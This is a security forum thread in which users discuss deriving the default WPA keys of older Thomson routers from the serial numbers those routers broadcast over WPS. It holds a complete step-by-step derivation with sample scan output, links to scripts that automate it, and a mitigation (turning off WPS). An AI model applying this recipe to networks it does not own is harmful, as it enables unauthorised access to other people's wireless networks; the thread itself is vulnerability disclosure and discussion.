What can someone do after discovering a "exploit"?

[TAPE]

sry, just cant seem to prevent the double posts for some reason

[Snayler]

So, it turns out there was already a tool capable of exploiting what I discovered, the only thing I am is the first person to notice this flaw on the maker routers, and now, bring it to public. The affected router brand is Thomson and, as I recently got access to a latest model of this routers (TG784n)*, I have to re-phrase my initial statement. This flaw can only be found on older models of this brand of routers.

*: I found a colleague with this kind of router, and he gave me visual access to the router (the only thing I needed to test the flaw) and the wireless key I got trough the calculations differed from the default wireless key found in the sticker. So I assume that newer models (maybe from 2010/11 to the future) do not have this vulnerability.

In order to explain my findings, I have to introduce some background:
As some (or all, given that we are on a security related forum) of you may know, back in 2008, Kevin Devine discovered a flaw in SpeedTouch and Thomson routers that would allow him to calculate the default wireless encryption key for each router. He released a tool capable of calculating and providing the user with the default password, only using the last 6 characters of the default SSID (More info @ GNUCitizen.org ).

But, somewhat around 2010, Thomson fixed this vulnerability by changing the last 6 digits of the default SSID (now they match the last 6 digits of the wireless interface MAC address, instead of the last 6 digits from the sha1 hash [read link above]). Unfortunately, it was still insecure, since with Kevin's findings, it was possible to generate a password list for every router made in 2010/2011 (and now 2012) that would substantially reduce the brute-force attack time against a WPA handshake (I talked about this vulnerability in this forums a while back, a quick search should reveal it). That must be why they changed the whole algorithm in newer models.

Now, with the recent discovery of WPS vulnerabilities, one of them being that the routers give too much information about themselves, such as maker, model and Serial Number ("Oh!" you say ), it was easy to develop a way to use this information to get the default wireless key:

Using a tool called wpscan (not the WordPress one) developed by SourceSec, an attacker could get a output like this (values are fictional):

Code:

root@bt~#:wpscan -i mon0
BSSID: 01:23:45:94:0D:89
ESSID: Thomson940D89
----------------------------------------------------------
Version                           : 0x10
WPS State                         : 0x02
Response Type                     : 0x03
UUID-E                            : 0xcx1x1xex8xfxfx0x8xax7x0xdxdx4x2x
Manufacturer                      : THOMSON
Model Name                        : Thomson TG
Model Number                      : 787
Serial Number                     : 1011TSABC
Primary Device Type               : 0x0123456789012345
Device Name                       : Thomson TG787
Config Methods                    : 0x0001
RF Bands                          : 0x00

From this, an attacker could check if the router has this flaw (by checking the model, in blue) and if it was vulnerable, he would grab the Serial Number and start the calculation process:

Code:

1011TSABC

Add "CP" to the beginning of the string and remove "TS" value (always the 2 characters in-between the first 4 numbers and the last 3 characters):

Code:

CP1011ABC

Convert last 3 characters to hexadecimal (and convert lowercase to uppercase, case it has letters):

Code:

CP1011414243

Process this last string trough sha-1:

Code:

8d6bea96fc2eb7b52020c45492e379cab1940d89

Grab the first 10 digits, Uppercase them, and here is the default wireless key:

Code:

8D6BEA96FC

Note: If you're going to test this, please try to isolate your AP on a specific channel, airodump that channel and run wpscan after. I'm telling you this because "WPScan actively sends 802.11 probe requests to access points that advertise WPS support", and that could be considered illegal (I'm not sure, but just to be safe...).

Cheers!

P.S.: This vulnerability can be fixed by turning off WPS, wich is enabled by default. It can be done trough telnet (never found the option on the web interface), this site will help with the commands needed. Obviously, even after turning off WPS, the router will not be secure if it has the default password set (due to the other vulnerabilities I mentioned earlier).

[Snayler]

Hi again! Someone edited the wpscan.py script to include the hash calculations for Thomson routers. If you want to give it a try, here's the modified code:
pastebin - wps2key.py

[hannah]

Code:

CP1011ABC

Convert last 3 characters to hexadecimal (and convert lowercase to uppercase, case it has letters):

Code:

CP1011414243

Hi Snayler.. many thanks for sharing this knowledge. I am having a little difficulties understanding this above step.
Can you please explain however did you arrive '414243' from 'ABC'?

Many thanks

Hannah

[Snayler]

Can you please explain however did you arrive '414243' from 'ABC'?

I get '414243' from 'ABC' by converting ascii values to hexadecimal values. The following links should help:

Code:

http://centricle.com/tools/ascii-hex/
http://www.asciitable.com/index/asciifull.gif

There's also a tool available that can exploit this:

Code:

http://pastebin.ca/2110985

[hannah]

Hey Snayler

Thanks a lot for such a quick reply. Really appreciate it. And yes I already tested the script from http://pastebin.ca/2110985

Just really wanted to learn the process.. Thanks again.

I find the this forum is very quiet these days. Hope all are doing pretty good.
Regards

[ternarybit]

@Snayler this is very interesting. I suspect many router vendors employ similar means to derive default WPA keys. Since the key is ultimately the product of the non-reversible SHA1 hash function, I wonder, how did you derive the algorithm, specifically the part about adding CP and removing TS? Did you just play around with serial numbers until you figured it out?

[hannah]

Did you just play around with serial numbers until you figured it out?

As mentioned in post #12 please read this blog posting..

http://www.gnucitizen.org/blog/defau...e-hub-routers/

It's mentioned in quite a detail there.

[Snayler]

@Snayler this is very interesting. I suspect many router vendors employ similar means to derive default WPA keys. Since the key is ultimately the product of the non-reversible SHA1 hash function, I wonder, how did you derive the algorithm, specifically the part about adding CP and removing TS? Did you just play around with serial numbers until you figured it out?

No! I'm not that smart Back in April 2008, Kevin Devine discovered that flaw (calculating the default password from the serial number) and created a PoC where you can calculate all possible default passwords based on the last 6 chars of the default SSID. Around 2009/2010, Thomson (I guess) fixed this issue by changing the last chars of the SSID to the last 6 chars of the AP's MAC address. This fixed the vulnerability found by Kevin, but I discovered that the router freely announces it's serial number through WPS. So I just had to check Kevin's discovery on how to calculate the default password from the serial number and ta-da! Vulnerability found. If you want, you can read more about Kevin's findings in the link posted by hannah. If you want a more hardcore explanation, you can read it here:

Code:

http://www.hakim.ws/st585/KevinDevine/

Cheers!

[hannah]

@Snayler

thanks for this link...
http://www.hakim.ws/st585/KevinDevine/

let's dig in..